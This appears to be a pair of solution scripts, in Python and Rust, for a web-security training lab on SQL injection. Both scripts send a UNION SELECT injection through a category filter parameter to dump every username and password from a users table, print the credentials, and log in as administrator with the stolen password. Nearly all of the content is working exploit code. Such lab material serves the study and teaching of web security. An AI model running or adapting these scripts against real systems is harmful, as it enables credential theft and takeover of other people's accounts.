File: with-python/sql-injection/05-union-attack-retrieving-data-from-other-tables.py
from lib import (
    SESSION,
    generate_parser,
    find_no_of_columns,
    find_columns_of_type_string,
    check_is_lab_solved,
    login_as_administrator,
)
from lxml import html

if __name__ == "__main__":
    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    columns = find_no_of_columns(f"{lab_url}/filter?category=")

    target_columns = find_columns_of_type_string(
        lab_url_with_end_point=f"{lab_url}/filter?category=",
        no_of_columns=columns,
    )

    print("[+] Fetching the `username` and `password` columns from `users` table")

    print(
        f"[+] Making query: {lab_url}/filter?category=' UNION SELECT username, password FROM users--"
    )

    response = SESSION.get(
        f"{lab_url}/filter?category=' UNION SELECT username, password FROM users--"
    )

    if response.status_code == 200:
        tree = html.fromstring(response.text)

        usernames = tree.xpath("//table/tbody/tr/th/text()")
        passwords = tree.xpath("//table/tbody/tr/td/text()")

        print("[+] Credentials found in the `users` table:")

        users_dict = dict()

        print()
        for username, password in zip(usernames, passwords):
            users_dict[username] = password
            print(f"{username}:{password}")
        print()

        administrator_password = users_dict.get("administrator")

        if administrator_password:
            login_as_administrator(lab_url, administrator_password)
        else:
            print("[-] administrator credential not found")
            exit()

    else:
        print("[-] Failed to fetch the usernames and passwords")
        exit()

    check_is_lab_solved(lab_url)

File: with-rust/server-side/sql-injection/src/bin/05-union-attack-retrieving-data-from-other-tables.rs
use scraper::{Html, Selector};
use server_side_sql_injection::{
    HTTP_CLIENT, check_is_lab_solved, find_columns_of_type_string, find_no_of_columns,
    generate_clap_parser, login_as_administrator,
};
use std::{collections::HashMap, sync::LazyLock};

static TABLE_TH_SELECTOR: LazyLock<Selector> = LazyLock::new(|| {
    Selector::parse("table tbody tr th").expect("Failed to construct the TABLE_TH_SELECTOR")
});

static TABLE_TD_SELECTOR: LazyLock<Selector> = LazyLock::new(|| {
    Selector::parse("table tbody tr td").expect("Failed to construct the TABLE_TD_SELECTOR")
});

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");

    let lab_url_with_endpoint = format!("{lab_url}/filter?category=");

    let columns = find_no_of_columns(&lab_url_with_endpoint, None, None);

    find_columns_of_type_string(&lab_url_with_endpoint, columns, None, None);

    logger::info("Fetching the `username` and `password` columns from `users` table");
    logger::info(
        format!(
            "Making query: {}/filter?category=' UNION SELECT username, password FROM users--",
            lab_url
        )
        .as_ref(),
    );

    let response = HTTP_CLIENT
        .get(format!(
            "{}/filter?category=' UNION SELECT username, password FROM users--",
            lab_url
        ))
        .send()
        .expect("[-] ");

    if response.status() == 200 {
        let document = Html::parse_document(
            response
                .text()
                .expect("[-] Failed to extract the body")
                .as_ref(),
        );

        let usernames: Vec<String> = document
            .select(&TABLE_TH_SELECTOR)
            .flat_map(|element_ref| element_ref.text())
            .map(str::to_string)
            .collect();

        let passwords: Vec<String> = document
            .select(&TABLE_TD_SELECTOR)
            .flat_map(|element_ref| element_ref.text())
            .map(str::to_string)
            .collect();

        let users_hashmap: HashMap<String, String> = usernames.into_iter().zip(passwords).collect();

        logger::success("Credentials found in the `users` table:");

        println!();
        for (username, password) in users_hashmap.iter() {
            println!("{}:{}", username, password);
        }
        println!();

        if users_hashmap.contains_key("administrator") {
            login_as_administrator(
                lab_url,
                users_hashmap.get("administrator").unwrap().to_string(),
            );
        } else {
            panic!(
                "{}",
                logger::error_return("administrator credential not found")
            );
        }
    } else {
        panic!(
            "{}",
            logger::error_return("Failed to fetch the usernames and passwords")
        );
    }

    check_is_lab_solved(lab_url);
}
